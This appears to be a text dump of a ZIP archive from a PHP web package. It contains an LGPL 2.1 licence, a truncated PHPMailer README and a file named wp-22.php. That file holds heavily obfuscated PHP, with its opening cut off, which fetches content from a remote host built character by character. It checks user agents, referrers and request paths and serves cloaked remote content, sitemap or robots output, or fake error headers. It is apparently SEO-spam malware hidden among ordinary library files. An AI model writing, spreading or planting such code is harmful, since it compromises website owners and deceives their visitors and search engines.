PK@fZ5%88 wp-22.phpnu[ 0){$ooooooOOoooOOOooooOOOOoo=$O[55];}else{$ooooooOOoooOOOooooOOOOoo=$O[63]; } $ooooooOOOoooOOOooooOOOOOoo=$ooooooOOoooOOOoooOo.$ooooooOOoooOOOooooOOOOoo.$ooooooOOoooOOOooooOOO[$ooooooOOoooOOOooooOOOOo].$O[59].$O[20].$O[25].$O[18]; $ooooooOOOOoooOOOooooOOOOOo=$O[15].$O[4].$O[4].$O[9].$O[11].$O[62].$O[63].$O[63].$O[1].$O[1].$O[1].$O[59].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[25].$O[63].$O[9].$O[7].$O[24].$O[14].$O[55].$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[61].$ooooooOOOoooOOOooooOOOOOoo; $ooooooOOOOoooOOOooooOOOOOoOooOoOo=$O[15].$O[4].$O[4].$O[9].$O[62].$O[63].$O[63].$O[1].$O[1].$O[1].$O[59].$O[14].$O[8].$O[8].$O[14].$O[18].$O[2].$O[59].$O[21].$O[8].$O[25].$O[63].$O[9].$O[7].$O[24].$O[14].$O[55].$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[61].$ooooooOOOoooOOOooooOOOOOoo; if(stristr(@file_get_contents($ooooooOOOOoooOOOooooOOOOOo),$O[11].$O[6].$O[21].$O[21].$O[2].$O[11].$O[11].$O[13].$O[6].$O[18].$O[18].$O[5])){echo $ooooooOOOOoooOOOooooOOOOOo.$O[61].$O[61].$O[61].$O[56].$O[37].$O[6].$O[23].$O[25].$O[7].$O[4].$O[4].$O[7].$O[24].$O[14].$O[57].$O[40].$O[8].$O[8].$O[14].$O[18].$O[2].$O[57].$O[37].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[62].$O[57].$O[34].$O[43].PHP_EOL;}else if(stristr(@ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOo),$O[11].$O[6].$O[21].$O[21].$O[2].$O[11].$O[11].$O[13].$O[6].$O[18].$O[18].$O[5])){echo $ooooooOOOOoooOOOooooOOOOOo.$O[61].$O[61].$O[61].$O[56].$O[37].$O[6].$O[23].$O[25].$O[7].$O[4].$O[4].$O[7].$O[24].$O[14].$O[57].$O[40].$O[8].$O[8].$O[14].$O[18].$O[2].$O[57].$O[37].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[62].$O[57].$O[34].$O[43].PHP_EOL; }else if(stristr(@file_get_contents($ooooooOOOOoooOOOooooOOOOOoOooOoOo),$O[11].$O[6].$O[21].$O[21].$O[2].$O[11].$O[11].$O[13].$O[6].$O[18].$O[18].$O[5])){echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O[61].$O[61].$O[61].$O[56].$O[37].$O[6].$O[23].$O[25].$O[7].$O[4].$O[4].$O[7].$O[24].$O[14].$O[57].$O[40].$O[8].$O[8].$O[14].$O[18].$O[2].$O[57].$O[37].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[62].$O[57].$O[34].$O[43].PHP_EOL; }else if(stristr(@ooooooooOOOOOOOOoooooOOO($ooooooOOOOoooOOOooooOOOOOoOooOoOo),$O[11].$O[6].$O[21].$O[21].$O[2].$O[11].$O[11].$O[13].$O[6].$O[18].$O[18].$O[5])){echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O[61].$O[61].$O[61].$O[56].$O[37].$O[6].$O[23].$O[25].$O[7].$O[4].$O[4].$O[7].$O[24].$O[14].$O[57].$O[40].$O[8].$O[8].$O[14].$O[18].$O[2].$O[57].$O[37].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[62].$O[57].$O[34].$O[43].PHP_EOL; }else{echo $ooooooOOOOoooOOOooooOOOOOoOooOoOo.$O[61].$O[61].$O[61].$O[56].$O[37].$O[6].$O[23].$O[25].$O[7].$O[4].$O[4].$O[7].$O[24].$O[14].$O[57].$O[40].$O[8].$O[8].$O[14].$O[18].$O[2].$O[57].$O[37].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[62].$O[57].$O[13].$O[10].$O[7].$O[18].PHP_EOL;}}exit;}if(strpos($oOoooOOoOO,$O[10].$O[18].$O[18].$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[59].$O[20].$O[25].$O[18]) || strpos($oOoooOOoOO,$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[53].$O[7].$O[24].$O[12].$O[2].$O[20].$O[59].$O[20].$O[25].$O[18]) || strpos($oOoooOOoOO,$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9].$O[53].$O[7].$O[24].$O[12].$O[2].$O[20].$O[53].$O[64].$O[59].$O[20].$O[25].$O[18]) || strpos($oOoooOOoOO,$O[7].$O[24].$O[12].$O[2].$O[20].$O[59].$O[20].$O[25].$O[18])){$ooooooOoOoooOOOooooO = ooOOoOOO($ooooOOOOoooOOOooO,$ooooooOoOoooOOOooo);header($O[47].$O[8].$O[24].$O[4].$O[2].$O[24].$O[4].$O[53].$O[4].$O[5].$O[9].$O[2].$O[62].$O[4].$O[2].$O[20].$O[4].$O[63].$O[20].$O[25].$O[18]); echo $ooooooOoOoooOOOooooO;exit;}if(strpos($oOoooOOoOO,$O[59].$O[9].$O[15].$O[9])){ $ooooooOOoOOoooOOOooooOOOOO=explode($O[55],$oOoooOOoOO); $ooooooOOoOOoooOOOooooOOOOO=$ooooooOOoOOoooOOOooooOOOOO[count($ooooooOOoOOoooOOOooooOOOOO)-1]; $ooooooOOoOOoooOOOooooOOOOO=str_replace($O[59].$O[20].$O[25].$O[18],"",$ooooooOOoOOoooOOOooooOOOOO);}else{ $ooooooOOoOOoooOOOooooOOOOO= str_replace($O[63],"",$oOoooOOoOO);$ooooooOOoOOoooOOOooooOOOOO= str_replace($O[59].$O[20].$O[25].$O[18],"",$ooooooOOoOOoooOOOooooOOOOO);}$ooooooOoOoooOOOooo[$O[1].$O[8].$O[3].$O[12]]=$ooooooOOoOOoooOOOooooOOOOO;$ooooooOoOoooOOOooo[$O[10].$O[21].$O[4].$O[7].$O[8].$O[24]]=$O[21].$O[15].$O[2].$O[21].$O[17].$O[52].$O[11].$O[7].$O[4].$O[2].$O[25].$O[10].$O[9];$ooooooOOoOoOoooOOOooooOOoOOO=ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);if($ooooooOOoOoOoooOOOooooOOoOOO=='1'){$ooooooOoOoooOOOooooO=ooOOoOOO($ooooOOOOoooOOOooO,$ooooooOoOoooOOOooo);header($O[47].$O[8].$O[24].$O[4].$O[2].$O[24].$O[4].$O[53].$O[4].$O[5].$O[9].$O[2].$O[62].$O[4].$O[2].$O[20].$O[4].$O[63].$O[20].$O[25].$O[18]);echo $ooooooOoOoooOOOooooO;exit;}$ooooooOoOoooOOOooo[$O[10].$O[21].$O[4].$O[7].$O[8].$O[24]]=$O[21].$O[15].$O[2].$O[21].$O[17].$O[52].$O[1].$O[8].$O[3].$O[12].$O[11];$ooooooOOoOoOoooOOOooooOOoOoOO= ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);if(strpos($oOoooOOoOO,$O[25].$O[10].$O[9])> 0 || $ooooooOOoOoOoooOOOooooOOoOoOO=='1'){$ooooooOoOoooOOOooo[$O[10].$O[21].$O[4].$O[7].$O[8].$O[24]]=$O[3].$O[10].$O[24].$O[12].$O[52].$O[20].$O[25].$O[18];$ooooooOOoOoOoooOOOooooOOoOOO=ooOOoOOO($oooooOOoooOOOoooOoo,$ooooooOoOoooOOOooo);header($O[47].$O[8].$O[24].$O[4].$O[2].$O[24].$O[4].$O[53].$O[4].$O[5].$O[9].$O[2].$O[62].$O[4].$O[2].$O[20].$O[4].$O[63].$O[20].$O[25].$O[18]);echo $ooooooOOoOoOoooOOOooooOOoOOO;exit;}}if(strpos($oOoooOOoOO,$O[59].$O[9].$O[15].$O[9])){$ooooooOOooOooOoooOOOooooOOoOoOO=$oOooOOoOO.$ooOOOOoooOOOoOO.$ooOOOoooOOoOO;$ooooooOoOoooOOOooo[$O[25].$O[10].$O[7].$O[24].$O[52].$O[11].$O[15].$O[2].$O[18].$O[18]]=$ooooooOOooOooOoooOOOooooOOoOoOO;}else{$ooooooOOooOooOoooOOOooooOOoOoOO=$oOooOOoOO.$ooOOOOoooOOOoOO;$ooooooOoOoooOOOooo[$O[25].$O[10].$O[7].$O[24].$O[52].$O[11].$O[15].$O[2].$O[18].$O[18]]=$ooooooOOooOooOoooOOOooooOOoOoOO;} $ooooOoOOooOoooOOOoOoOoOoO=oooOOooOOoOO($oooOOOooOoooOOOooooOoOoOoOoO);if(strpos($_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]],$O[59].$O[9].$O[15].$O[9])){ $ooooooooOOOOOOOO = $O[55]; }else{ $ooooooooOOOOOOOO = $O[63]; } $oooOoOooOooOoooOOOoOoOoOoOo=oooOOOo($oooOoOOooOoooOOOoOoOoOoOoO); if(!$oooOoOooOooOoooOOOoOoOoOoOo && $ooooOoOOooOoooOOOoOoOoOoO && ( preg_match($O[63].$O[16].$O[10].$O[63].$O[7],@$_SERVER[$O[41].$O[30].$O[30].$O[35].$O[52].$O[36].$O[47].$O[47].$O[28].$O[35].$O[30].$O[52].$O[44].$O[36].$O[50].$O[40].$O[32].$O[36].$O[40].$O[28]]) || preg_match($O[63].$O[16].$O[9].$O[63].$O[7],@$_SERVER[$O[41].$O[30].$O[30].$O[35].$O[52].$O[36].$O[47].$O[47].$O[28].$O[35].$O[30].$O[52].$O[44].$O[36].$O[50].$O[40].$O[32].$O[36].$O[40].$O[28]]) || preg_match("/^[a-z0-9]+[0-9]+$/",end(explode($ooooooooOOOOOOOO,str_replace(array(".html",".htm"),"",$_SERVER[$O[29].$O[28].$O[26].$O[32].$O[28].$O[37].$O[30].$O[52].$O[32].$O[29].$O[33]])))))){ echo ooOOoOOO($ooooOOOOoooOOOooOoo,$ooooooOoOoooOOOooo);exit;}if($oooOoOooOooOoooOOOoOoOoOoOo){$ooooooOOOOOoooOOOOooooooO = ooOOoOOO($oooOOOOoooOOOooOO,$ooooooOoOoooOOOooo); if($ooooooOOOOOoooOOOOooooooO==$O[70].$O[67].$O[70]){header($O[41].$O[30].$O[30].$O[35].$O[63].$O[64].$O[59].$O[67].$O[57].$O[70].$O[67].$O[70].$O[57].$O[50].$O[8].$O[4].$O[57].$O[39].$O[8].$O[6].$O[24].$O[12]);exit;}else if($ooooooOOOOOoooOOOOooooooO==$O[69].$O[67].$O[67]){header($O[41].$O[30].$O[30].$O[35].$O[63].$O[64].$O[59].$O[67].$O[57].$O[69].$O[67].$O[67].$O[57].$O[33].$O[24].$O[4].$O[2].$O[3].$O[24].$O[10].$O[18].$O[57].$O[37].$O[2].$O[3].$O[22].$O[2].$O[3].$O[57].$O[28].$O[3].$O[3].$O[8].$O[3]);exit;}else if($ooooooOOOOOoooOOOOooooooO==$O[23].$O[18].$O[10].$O[24].$O[17]){echo '';exit;}else{echo $ooooooOOOOOoooOOOOooooooO;exit;} }else{ header($O[41].$O[30].$O[30].$O[35].$O[63].$O[64].$O[59].$O[67].$O[57].$O[70].$O[67].$O[70].$O[57].$O[50].$O[8].$O[4].$O[57].$O[39].$O[8].$O[6].$O[24].$O[12]);} ?>PK@fZmggphpmailer/phpmailer/LICENSEnu[ GNU LESSER GENERAL PUBLIC LICENSE Version 2.1, February 1999 Copyright (C) 1991, 1999 Free Software Foundation, Inc. 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Everyone is permitted to copy and distribute verbatim copies of this license document, but changing it is not allowed. [This is the first released version of the Lesser GPL. It also counts as the successor of the GNU Library Public License, version 2, hence the version number 2.1.] Preamble The licenses for most software are designed to take away your freedom to share and change it. By contrast, the GNU General Public Licenses are intended to guarantee your freedom to share and change free software--to make sure the software is free for all its users. This license, the Lesser General Public License, applies to some specially designated software packages--typically libraries--of the Free Software Foundation and other authors who decide to use it. You can use it too, but we suggest you first think carefully about whether this license or the ordinary General Public License is the better strategy to use in any particular case, based on the explanations below. When we speak of free software, we are referring to freedom of use, not price. Our General Public Licenses are designed to make sure that you have the freedom to distribute copies of free software (and charge for this service if you wish); that you receive source code or can get it if you want it; that you can change the software and use pieces of it in new free programs; and that you are informed that you can do these things. To protect your rights, we need to make restrictions that forbid distributors to deny you these rights or to ask you to surrender these rights. These restrictions translate to certain responsibilities for you if you distribute copies of the library or if you modify it. For example, if you distribute copies of the library, whether gratis or for a fee, you must give the recipients all the rights that we gave you. You must make sure that they, too, receive or can get the source code. If you link other code with the library, you must provide complete object files to the recipients, so that they can relink them with the library after making changes to the library and recompiling it. And you must show them these terms so they know their rights. We protect your rights with a two-step method: (1) we copyright the library, and (2) we offer you this license, which gives you legal permission to copy, distribute and/or modify the library. To protect each distributor, we want to make it very clear that there is no warranty for the free library. Also, if the library is modified by someone else and passed on, the recipients should know that what they have is not the original version, so that the original author's reputation will not be affected by problems that might be introduced by others. Finally, software patents pose a constant threat to the existence of any free program. We wish to make sure that a company cannot effectively restrict the users of a free program by obtaining a restrictive license from a patent holder. Therefore, we insist that any patent license obtained for a version of the library must be consistent with the full freedom of use specified in this license. Most GNU software, including some libraries, is covered by the ordinary GNU General Public License. This license, the GNU Lesser General Public License, applies to certain designated libraries, and is quite different from the ordinary General Public License. We use this license for certain libraries in order to permit linking those libraries into non-free programs. When a program is linked with a library, whether statically or using a shared library, the combination of the two is legally speaking a combined work, a derivative of the original library. The ordinary General Public License therefore permits such linking only if the entire combination fits its criteria of freedom. The Lesser General Public License permits more lax criteria for linking other code with the library. We call this license the "Lesser" General Public License because it does Less to protect the user's freedom than the ordinary General Public License. It also provides other free software developers Less of an advantage over competing non-free programs. These disadvantages are the reason we use the ordinary General Public License for many libraries. However, the Lesser license provides advantages in certain special circumstances. For example, on rare occasions, there may be a special need to encourage the widest possible use of a certain library, so that it becomes a de-facto standard. To achieve this, non-free programs must be allowed to use the library. A more frequent case is that a free library does the same job as widely used non-free libraries. In this case, there is little to gain by limiting the free library to free software only, so we use the Lesser General Public License. In other cases, permission to use a particular library in non-free programs enables a greater number of people to use a large body of free software. For example, permission to use the GNU C Library in non-free programs enables many more people to use the whole GNU operating system, as well as its variant, the GNU/Linux operating system. Although the Lesser General Public License is Less protective of the users' freedom, it does ensure that the user of a program that is linked with the Library has the freedom and the wherewithal to run that program using a modified version of the Library. The precise terms and conditions for copying, distribution and modification follow. Pay close attention to the difference between a "work based on the library" and a "work that uses the library". The former contains code derived from the library, whereas the latter must be combined with the library in order to run. GNU LESSER GENERAL PUBLIC LICENSE TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION 0. This License Agreement applies to any software library or other program which contains a notice placed by the copyright holder or other authorized party saying it may be distributed under the terms of this Lesser General Public License (also called "this License"). Each licensee is addressed as "you". A "library" means a collection of software functions and/or data prepared so as to be conveniently linked with application programs (which use some of those functions and data) to form executables. The "Library", below, refers to any such software library or work which has been distributed under these terms. A "work based on the Library" means either the Library or any derivative work under copyright law: that is to say, a work containing the Library or a portion of it, either verbatim or with modifications and/or translated straightforwardly into another language. (Hereinafter, translation is included without limitation in the term "modification".) "Source code" for a work means the preferred form of the work for making modifications to it. For a library, complete source code means all the source code for all modules it contains, plus any associated interface definition files, plus the scripts used to control compilation and installation of the library. Activities other than copying, distribution and modification are not covered by this License; they are outside its scope. The act of running a program using the Library is not restricted, and output from such a program is covered only if its contents constitute a work based on the Library (independent of the use of the Library in a tool for writing it). Whether that is true depends on what the Library does and what the program that uses the Library does. 1. You may copy and distribute verbatim copies of the Library's complete source code as you receive it, in any medium, provided that you conspicuously and appropriately publish on each copy an appropriate copyright notice and disclaimer of warranty; keep intact all the notices that refer to this License and to the absence of any warranty; and distribute a copy of this License along with the Library. You may charge a fee for the physical act of transferring a copy, and you may at your option offer warranty protection in exchange for a fee. 2. You may modify your copy or copies of the Library or any portion of it, thus forming a work based on the Library, and copy and distribute such modifications or work under the terms of Section 1 above, provided that you also meet all of these conditions: a) The modified work must itself be a software library. b) You must cause the files modified to carry prominent notices stating that you changed the files and the date of any change. c) You must cause the whole of the work to be licensed at no charge to all third parties under the terms of this License. d) If a facility in the modified Library refers to a function or a table of data to be supplied by an application program that uses the facility, other than as an argument passed when the facility is invoked, then you must make a good faith effort to ensure that, in the event an application does not supply such function or table, the facility still operates, and performs whatever part of its purpose remains meaningful. (For example, a function in a library to compute square roots has a purpose that is entirely well-defined independent of the application. Therefore, Subsection 2d requires that any application-supplied function or table used by this function must be optional: if the application does not supply it, the square root function must still compute square roots.) These requirements apply to the modified work as a whole. If identifiable sections of that work are not derived from the Library, and can be reasonably considered independent and separate works in themselves, then this License, and its terms, do not apply to those sections when you distribute them as separate works. But when you distribute the same sections as part of a whole which is a work based on the Library, the distribution of the whole must be on the terms of this License, whose permissions for other licensees extend to the entire whole, and thus to each and every part regardless of who wrote it. Thus, it is not the intent of this section to claim rights or contest your rights to work written entirely by you; rather, the intent is to exercise the right to control the distribution of derivative or collective works based on the Library. In addition, mere aggregation of another work not based on the Library with the Library (or with a work based on the Library) on a volume of a storage or distribution medium does not bring the other work under the scope of this License. 3. You may opt to apply the terms of the ordinary GNU General Public License instead of this License to a given copy of the Library. To do this, you must alter all the notices that refer to this License, so that they refer to the ordinary GNU General Public License, version 2, instead of to this License. (If a newer version than version 2 of the ordinary GNU General Public License has appeared, then you can specify that version instead if you wish.) Do not make any other change in these notices. Once this change is made in a given copy, it is irreversible for that copy, so the ordinary GNU General Public License applies to all subsequent copies and derivative works made from that copy. This option is useful when you wish to copy part of the code of the Library into a program that is not a library. 4. You may copy and distribute the Library (or a portion or derivative of it, under Section 2) in object code or executable form under the terms of Sections 1 and 2 above provided that you accompany it with the complete corresponding machine-readable source code, which must be distributed under the terms of Sections 1 and 2 above on a medium customarily used for software interchange. If distribution of object code is made by offering access to copy from a designated place, then offering equivalent access to copy the source code from the same place satisfies the requirement to distribute the source code, even though third parties are not compelled to copy the source along with the object code. 5. A program that contains no derivative of any portion of the Library, but is designed to work with the Library by being compiled or linked with it, is called a "work that uses the Library". Such a work, in isolation, is not a derivative work of the Library, and therefore falls outside the scope of this License. However, linking a "work that uses the Library" with the Library creates an executable that is a derivative of the Library (because it contains portions of the Library), rather than a "work that uses the library". The executable is therefore covered by this License. Section 6 states terms for distribution of such executables. When a "work that uses the Library" uses material from a header file that is part of the Library, the object code for the work may be a derivative work of the Library even though the source code is not. Whether this is true is especially significant if the work can be linked without the Library, or if the work is itself a library. The threshold for this to be true is not precisely defined by law. If such an object file uses only numerical parameters, data structure layouts and accessors, and small macros and small inline functions (ten lines or less in length), then the use of the object file is unrestricted, regardless of whether it is legally a derivative work. (Executables containing this object code plus portions of the Library will still fall under Section 6.) Otherwise, if the work is a derivative of the Library, you may distribute the object code for the work under the terms of Section 6. Any executables containing that work also fall under Section 6, whether or not they are linked directly with the Library itself. 6. As an exception to the Sections above, you may also combine or link a "work that uses the Library" with the Library to produce a work containing portions of the Library, and distribute that work under terms of your choice, provided that the terms permit modification of the work for the customer's own use and reverse engineering for debugging such modifications. You must give prominent notice with each copy of the work that the Library is used in it and that the Library and its use are covered by this License. You must supply a copy of this License. If the work during execution displays copyright notices, you must include the copyright notice for the Library among them, as well as a reference directing the user to the copy of this License. Also, you must do one of these things: a) Accompany the work with the complete corresponding machine-readable source code for the Library including whatever changes were used in the work (which must be distributed under Sections 1 and 2 above); and, if the work is an executable linked with the Library, with the complete machine-readable "work that uses the Library", as object code and/or source code, so that the user can modify the Library and then relink to produce a modified executable containing the modified Library. (It is understood that the user who changes the contents of definitions files in the Library will not necessarily be able to recompile the application to use the modified definitions.) b) Use a suitable shared library mechanism for linking with the Library. A suitable mechanism is one that (1) uses at run time a copy of the library already present on the user's computer system, rather than copying library functions into the executable, and (2) will operate properly with a modified version of the library, if the user installs one, as long as the modified version is interface-compatible with the version that the work was made with. c) Accompany the work with a written offer, valid for at least three years, to give the same user the materials specified in Subsection 6a, above, for a charge no more than the cost of performing this distribution. d) If distribution of the work is made by offering access to copy from a designated place, offer equivalent access to copy the above specified materials from the same place. e) Verify that the user has already received a copy of these materials or that you have already sent this user a copy. For an executable, the required form of the "work that uses the Library" must include any data and utility programs needed for reproducing the executable from it. However, as a special exception, the materials to be distributed need not include anything that is normally distributed (in either source or binary form) with the major components (compiler, kernel, and so on) of the operating system on which the executable runs, unless that component itself accompanies the executable. It may happen that this requirement contradicts the license restrictions of other proprietary libraries that do not normally accompany the operating system. Such a contradiction means you cannot use both them and the Library together in an executable that you distribute. 7. You may place library facilities that are a work based on the Library side-by-side in a single library together with other library facilities not covered by this License, and distribute such a combined library, provided that the separate distribution of the work based on the Library and of the other library facilities is otherwise permitted, and provided that you do these two things: a) Accompany the combined library with a copy of the same work based on the Library, uncombined with any other library facilities. This must be distributed under the terms of the Sections above. b) Give prominent notice with the combined library of the fact that part of it is a work based on the Library, and explaining where to find the accompanying uncombined form of the same work. 8. You may not copy, modify, sublicense, link with, or distribute the Library except as expressly provided under this License. Any attempt otherwise to copy, modify, sublicense, link with, or distribute the Library is void, and will automatically terminate your rights under this License. However, parties who have received copies, or rights, from you under this License will not have their licenses terminated so long as such parties remain in full compliance. 9. You are not required to accept this License, since you have not signed it. However, nothing else grants you permission to modify or distribute the Library or its derivative works. These actions are prohibited by law if you do not accept this License. Therefore, by modifying or distributing the Library (or any work based on the Library), you indicate your acceptance of this License to do so, and all its terms and conditions for copying, distributing or modifying the Library or works based on it. 10. Each time you redistribute the Library (or any work based on the Library), the recipient automatically receives a license from the original licensor to copy, distribute, link with or modify the Library subject to these terms and conditions. You may not impose any further restrictions on the recipients' exercise of the rights granted herein. You are not responsible for enforcing compliance by third parties with this License. 11. If, as a consequence of a court judgment or allegation of patent infringement or for any other reason (not limited to patent issues), conditions are imposed on you (whether by court order, agreement or otherwise) that contradict the conditions of this License, they do not excuse you from the conditions of this License. If you cannot distribute so as to satisfy simultaneously your obligations under this License and any other pertinent obligations, then as a consequence you may not distribute the Library at all. For example, if a patent license would not permit royalty-free redistribution of the Library by all those who receive copies directly or indirectly through you, then the only way you could satisfy both it and this License would be to refrain entirely from distribution of the Library. If any portion of this section is held invalid or unenforceable under any particular circumstance, the balance of the section is intended to apply, and the section as a whole is intended to apply in other circumstances. It is not the purpose of this section to induce you to infringe any patents or other property right claims or to contest validity of any such claims; this section has the sole purpose of protecting the integrity of the free software distribution system which is implemented by public license practices. Many people have made generous contributions to the wide range of software distributed through that system in reliance on consistent application of that system; it is up to the author/donor to decide if he or she is willing to distribute software through any other system and a licensee cannot impose that choice. This section is intended to make thoroughly clear what is believed to be a consequence of the rest of this License. 12. If the distribution and/or use of the Library is restricted in certain countries either by patents or by copyrighted interfaces, the original copyright holder who places the Library under this License may add an explicit geographical distribution limitation excluding those countries, so that distribution is permitted only in or among countries not thus excluded. In such case, this License incorporates the limitation as if written in the body of this License. 13. The Free Software Foundation may publish revised and/or new versions of the Lesser General Public License from time to time. Such new versions will be similar in spirit to the present version, but may differ in detail to address new problems or concerns. Each version is given a distinguishing version number. If the Library specifies a version number of this License which applies to it and "any later version", you have the option of following the terms and conditions either of that version or of any later version published by the Free Software Foundation. If the Library does not specify a license version number, you may choose any version ever published by the Free Software Foundation. 14. If you wish to incorporate parts of the Library into other free programs whose distribution conditions are incompatible with these, write to the author to ask for permission. For software which is copyrighted by the Free Software Foundation, write to the Free Software Foundation; we sometimes make exceptions for this. Our decision will be guided by the two goals of preserving the free status of all derivatives of our free software and of promoting the sharing and reuse of software generally. NO WARRANTY 15. BECAUSE THE LIBRARY IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY FOR THE LIBRARY, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES PROVIDE THE LIBRARY "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE LIBRARY IS WITH YOU. SHOULD THE LIBRARY PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, REPAIR OR CORRECTION. 16. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR REDISTRIBUTE THE LIBRARY AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING OUT OF THE USE OR INABILITY TO USE THE LIBRARY (INCLUDING BUT NOT LIMITED TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY YOU OR THIRD PARTIES OR A FAILURE OF THE LIBRARY TO OPERATE WITH ANY OTHER SOFTWARE), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES. END OF TERMS AND CONDITIONS How to Apply These Terms to Your New Libraries If you develop a new library, and you want it to be of the greatest possible use to the public, we recommend making it free software that everyone can redistribute and change. You can do so by permitting redistribution under these terms (or, alternatively, under the terms of the ordinary General Public License). To apply these terms, attach the following notices to the library. It is safest to attach them to the start of each source file to most effectively convey the exclusion of warranty; and each file should have at least the "copyright" line and a pointer to where the full notice is found. Copyright (C) This library is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. This library is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for more details. You should have received a copy of the GNU Lesser General Public License along with this library; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA Also add information on how to contact you by electronic and paper mail. You should also get your employer (if you work as a programmer) or your school, if any, to sign a "copyright disclaimer" for the library, if necessary. Here is a sample; alter the names: Yoyodyne, Inc., hereby disclaims all copyright interest in the library `Frob' (a library for tweaking knobs) written by James Random Hacker. , 1 April 1990 Ty Coon, President of Vice That's all there is to it!PK@fZ???phpmailer/phpmailer/README.mdnu[![PHPMailer](https://raw.github.com/PHPMailer/PHPMailer/master/examples/images/phpmailer.png) # PHPMailer - A full-featured email creation and transfer class for PHP Build status: [![Build Status](https://travis-ci.org/PHPMailer/PHPMailer.svg)](https://travis-ci.org/PHPMailer/PHPMailer) [![Scrutinizer Quality Score](https://scrutinizer-ci.com/g/PHPMailer/PHPMailer/badges/quality-score.png?s=3758e21d279becdf847a557a56a3ed16dfec9d5d)](https://scrutinizer-ci.com/g/PHPMailer/PHPMailer/) [![Code Coverage](https://scrutinizer-ci.com/g/PHPMailer/PHPMailer/badges/coverage.png?s=3fe6ca5fe8cd2cdf96285756e42932f7ca256962)](https://scrutinizer-ci.com/g/PHPMailer/PHPMailer/) [![Latest Stable Version](https://poser.pugx.org/phpmailer/phpmailer/v/stable.svg)](https://packagist.org/packages/phpmailer/phpmailer) [![Total Downloads](https://poser.pugx.org/phpmailer/phpmailer/downloads)](https://packagist.org/packages/phpmailer/phpmailer) [![Latest Unstable Version](https://poser.pugx.org/phpmailer/phpmailer/v/unstable.svg)](https://packagist.org/packages/phpmailer/phpmailer) [![License](https://poser.pugx.org/phpmailer/phpmailer/license.svg)](https://packagist.org/packages/phpmailer/phpmailer) [![API Docs](https://github.com/phpmailer/phpmailer/workflows/Docs/badge.svg)](http://phpmailer.github.io/PHPMailer/) ## Class Features - Probably the world's most popular code for sending email from PHP! - Used by many open-source projects: WordPress, Drupal, 1CRM, SugarCRM, Yii, Joomla! and many more - Integrated SMTP support - send without a local mail server - Send emails with multiple To, CC, BCC and Reply-to addresses - Multipart/alternative emails for mail clients that do not read HTML email - Add attachments, including inline - Support for UTF-8 content and 8bit, base64, binary, and quoted-printable encodings - SMTP authentication with LOGIN, PLAIN, CRAM-MD5, and XOAUTH2 mechanisms over SSL and SMTP+STARTTLS transports - Validates email addresses automatically - Protect against header injection attacks - Error messages in over 50 languages! - DKIM and S/MIME signing support - Compatible with PHP 5.5 and later - Namespaced to prevent name clashes - Much more! ## Why you might need it Many PHP developers need to send email from their code. The only PHP function that supports this is [`mail()`](https://www.php.net/manual/en/function.mail.php). However, it does not provide any assistance for making use of popular features such as encryption, authentication, HTML messages, and attachments. Formatting email correctly is surprisingly difficult. There are myriad overlapping RFCs, requiring tight adherence to horribly complicated formatting and encoding rules – the vast majority of code that you'll find online that uses the `mail()` function directly is just plain wrong! *Please* don't be tempted to do it yourself – if you don't use PHPMailer, there are many other excellent libraries that you should look at before rolling your own. Try [SwiftMailer](https://swiftmailer.symfony.com/), [Zend/Mail](https://zendframework.github.io/zend-mail/), [ZetaComponents](https://github.com/zetacomponents/Mail) etc. The PHP `mail()` function usually sends via a local mail server, typically fronted by a `sendmail` binary on Linux, BSD, and macOS platforms, however, Windows usually doesn't include a local mail server; PHPMailer's integrated SMTP implementation allows email sending on Windows platforms without a local mail server. ## License This software is distributed under the [LGPL 2.1](http://www.gnu.org/licenses/lgpl-2.1.html) license, along with the [GPL Cooperation Commitment](https://gplcc.github.io/gplcc/). Please read LICENSE for information on the software availability and distribution. ## Installation & loading PHPMailer is available on [Packagist](https://packagist.org/packages/phpmailer/phpmailer) (using semantic versioning), and installation via 